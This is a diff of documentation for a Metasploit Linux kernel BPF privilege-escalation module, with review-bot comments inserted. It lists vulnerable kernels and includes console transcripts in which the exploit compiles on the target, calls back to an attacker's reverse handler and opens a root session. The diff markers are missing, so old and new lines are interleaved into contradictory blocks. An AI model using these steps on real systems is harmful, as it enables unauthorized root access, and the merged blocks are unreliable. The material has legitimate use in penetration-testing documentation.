Fix bpf_sign_extension_priv_esc
@@ -1,20 +1,29 @@
## Vulnerable Application

This module exploits the Berkeley Packet Filter in the Linux kernel prior to 4.13.0,
which contains a vulnerability where it may improperly perform sign extentension.
This can be utilized to priv escalate. However, this module's offsets and
other parameters have only been set and tested against the 4.4.0-116 kernel.
Linux kernel prior to 4.14.8 utilizes the Berkeley Packet Filter (BPF)
which contains a vulnerability where it may improperly perform sign
extension. This can be utilized to escalate privileges.

This module has been successfully tested on:
The target system must be compiled with BPF support and must not have
`kernel.unprivileged_bpf_disabled` set to `1`.

* Ubuntu 16.04 with the 4.4.0-116 kernel
* Linux Mint 18 with the 4.4.0-116-generic kernel
This module has been tested successfully on:

### Meterpreter Exception

Due to a bug, this exploit can only be run on a non-meterpreter shell.
When run on meterpreter, or a shell spawned by meterpreter, the error `error: Invalid argument`
is thrown by the executable.
* Debian 9.0 kernel 4.9.0-3-amd64;
* Deepin 15.5 kernel 4.9.0-deepin13-amd64;
* ElementaryOS 0.4.1 kernel 4.8.0-52-generic;
* Fedora 25 kernel 4.8.6-300.fc25.x86_64;
* Fedora 26 kernel 4.11.8-300.fc26.x86_64;
* Fedora 27 kernel 4.13.9-300.fc27.x86_64;
* Linux Mint 17.3 kernel 4.4.0-89-generic;
* Linux Mint 18.0 kernel 4.8.0-58-generic;
* Linux Mint 18.3 kernel 4.13.0-16-generic;
* Mageia 6 kernel 4.9.35-desktop-1.mga6;
* Ubuntu 14.04.1 kernel 4.4.0-89-generic;
* Ubuntu 16.04.2 kernel 4.8.0-45-generic;
* Ubuntu 16.04.3 kernel 4.10.0-28-generic;
* Ubuntu 17.04 kernel 4.10.0-19-generic;
* ZorinOS 12.1 kernel 4.8.0-39-generic.

## Verification Steps

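Review bot: the `### Meterpreter Exception` section (the `error: Invalid argument` failure on meterpreter sessions and on shells spawned from them) is dropped in this hunk, but nothing in the hunk or in the commit message ("Fix bpf_sign_extension_priv_esc") records whether that limitation was actually resolved in the module; if it was, keep a one-line note under the requirements saying so, and if it was not, the section should stay. Two smaller points: the new requirement that `kernel.unprivileged_bpf_disabled` must not be set to `1` is the hardening control that blocks this technique, so it would help readers if the text also said what `check` reports on a host where it is set; and the new tested-on list terminates each item with `;` and the last with `.`, unlike the plain list items it replaces, so pick one style.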
@@ -145,55 +154,31 @@ It is possible to force pre-compiled binaries, in a scenario where `build-essent
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
```
### Linux Mint 18

### Debian 9.0 (x86_64)

```
msf5 exploit(multi/handler) > use exploit/linux/local/bpf_sign_extension_priv_esc
msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set verbose true
verbose => true
msf5 > use exploit/linux/local/bpf_sign_extension_priv_esc
msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > check

[!] SESSION may not be compatible with this module.
[+] Kernel confirmed vulnerable
[*] The target appears to be vulnerable.
msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set compile False
compile => False
msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > run

[!] SESSION may not be compatible with this module.

[*] Started reverse TCP handler on 172.16.191.188:4444
[+] Kernel confirmed vulnerable
[+] gcc is installed
[*] Live compiling exploit on system
[*] Writing files to target
[*] Writing UVQYvBTJ to /tmp/UVQYvBTJ.c
[*] Max line length is 65537
[*] Writing 7773 bytes in 1 chunks of 26765 bytes (octal-encoded), using printf
[*] Writing ljJApCaK to /tmp/ljJApCaK
[*] Max line length is 65537
[*] Writing 283 bytes in 1 chunks of 845 bytes (octal-encoded), using printf
[*] Starting execution of priv esc.
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (812100 bytes) to 172.16.191.207
[*] task_struct = ffff88003ce84600
[*] uidptr = ffff88003cc46f04
[*] spawning root shell
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.207:48276) at 2018-03-24 22:46:58 -0400
[+] Deleted /tmp/UVQYvBTJ.c
[+] Deleted /tmp/UVQYvBTJ
[+] Deleted /tmp/ljJApCaK
[!] This exploit may require manual cleanup of '/tmp/UVQYvBTJ.c' on the target
[!] This exploit may require manual cleanup of '/tmp/UVQYvBTJ' on the target
[!] This exploit may require manual cleanup of '/tmp/ljJApCaK' on the target

[*] Writing '/tmp/.JBJBxoEO' (34784 bytes) ...
[*] Writing '/tmp/.1pZhL1gc' (207 bytes) ...
[*] Launching exploit ...
[*] Sending stage (861480 bytes) to 172.16.191.236
[*] Cleaning up /tmp/.1pZhL1gc and /tmp/.JBJBxoEO ...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 172.16.191.207
OS : LinuxMint 18 (Linux 4.4.0-116-generic)
Computer : debian-9-0-x64.local
OS : Debian 9.4 (Linux 4.9.0-3-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
```

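Review bot: the Debian 9.0 transcript goes from `[*] Cleaning up /tmp/.1pZhL1gc and /tmp/.JBJBxoEO ...` straight to `meterpreter > getuid` with no `Started reverse TCP handler` or `Meterpreter session N opened` line, and its setup shows only `set session 1` (no `lhost` or payload), so a reader cannot trace how the root session was obtained; include the complete run output as the Linux Mint transcript does. Also, the heading says `Debian 9.0 (x86_64)` and `sysinfo` reports `Architecture : x64`, while the closing block lists both `BuildTuple : x86_64-linux-musl` / `Meterpreter : x64/linux` and `BuildTuple : i486-linux-musl` / `Meterpreter : x86/linux`; the add/remove markers are not visible in this rendering, so whichever pair belongs to the Debian run, the heading should match the payload architecture actually shown (or say explicitly that a 32-bit payload was run on a 64-bit host) so this does not read as a copy error.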